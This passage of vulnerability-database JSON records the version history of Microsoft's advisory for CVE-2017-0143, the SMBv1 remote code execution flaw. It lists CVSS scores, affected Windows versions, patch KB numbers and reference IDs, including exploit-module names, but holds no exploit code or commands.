"symantec", "idList": ["SMNTC-96703"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:146236"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2020-08-07T11:48:32", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2020-08-07T11:48:32", "rev": 2}}, "objectVersion": "1.4", "kbList": ["KB3213986", "KB4012217", "KB4012215", "KB3210721", "KB4012606", "KB4012216", "KB3205409", "KB3210720", "KB3205401", "KB4012598", "KB4013198", "KB3177186", "KB3212646", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for x64-based Systems Service Pack 2"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows Server 2012 R2 (Server Core installation)"}, {"kb": "KB4012606", "kbSupersedence": "KB3210720", "msplatform": "", "name": "Windows 10 for x64-based Systems"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows 8.1 for x64-based systems"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows Server 2016 (Server Core installation)"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows 7 for x64-based Systems Service Pack 1"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows 10 Version 1607 for 32-bit Systems"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows Server 2016"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Vista x64 Edition Service Pack 2"}, {"kb": "KB4013198", "kbSupersedence": "KB3210721", "msplatform": "", "name": "Windows 10 Version 1511 for x64-based Systems"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows RT 8.1"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for 32-bit Systems Service Pack 2"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Vista Service Pack 2"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows 8.1 for 32-bit systems"}, {"kb": "KB4013198", "kbSupersedence": "KB3210721", "msplatform": "", "name": "Windows 10 Version 1511 for 32-bit Systems"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)"}, {"kb": "KB4012217", "kbSupersedence": "KB3205409", "msplatform": "", "name": "Windows Server 2012 (Server Core installation)"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows Server 2012 R2"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows 10 Version 1607 for x64-based Systems"}, {"kb": "KB4012217", "kbSupersedence": "KB3205409", "msplatform": "", "name": "Windows Server 2012"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows 7 for 32-bit Systems Service Pack 1"}, {"kb": "KB4012606", "kbSupersedence": "KB3210720", "msplatform": "", "name": "Windows 10 for 32-bit Systems"}], "vendorCvss": {}}, "lastseen": "2020-08-07T11:48:32", "differentElements": ["href", "kbList", "msAffectedSoftware"], "edition": 2}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "7d880ac23613cccab94717a71e1949e7", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-03-18T19:17:49", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:156196"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-29702"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979", "KLA11902"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-03-18T19:17:49", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-03-18T19:17:49", "rev": 2}}, "objectVersion": "1.5", "kbList": ["KB4013198", "KB3205401", "KB3177186", "KB3212646", "KB4012214", "KB4012598", "KB3205409", "KBMS16-110, 3187754", "KB3210720", "KB3213986", "KB3210721", "KB4013429", "KB4012215", "KB4012216", "KB4012606", "KB4012217", "KB4012212", "KB4012213"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-03-18T19:17:49", "differentElements": ["cvss2", "cvss3"], "edition": 3}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-07-28T20:07:07", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27613"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-07-28T20:07:07", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-07-28T20:07:07", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3213986", "KB3212646", "KB4012213", "KB4013429", "KB4012216", "KB3210721", "KB3177186", "KB4012606", "KB4012217", "KBMS16-110, 3187754", "KB4013198", "KB4012598", "KB3210720", "KB4012215", "KB4012212", "KB4012214", "KB3205401", "KB3205409"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-07-28T20:07:07", "differentElements": ["msAffectedSoftware"], "edition": 4}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", 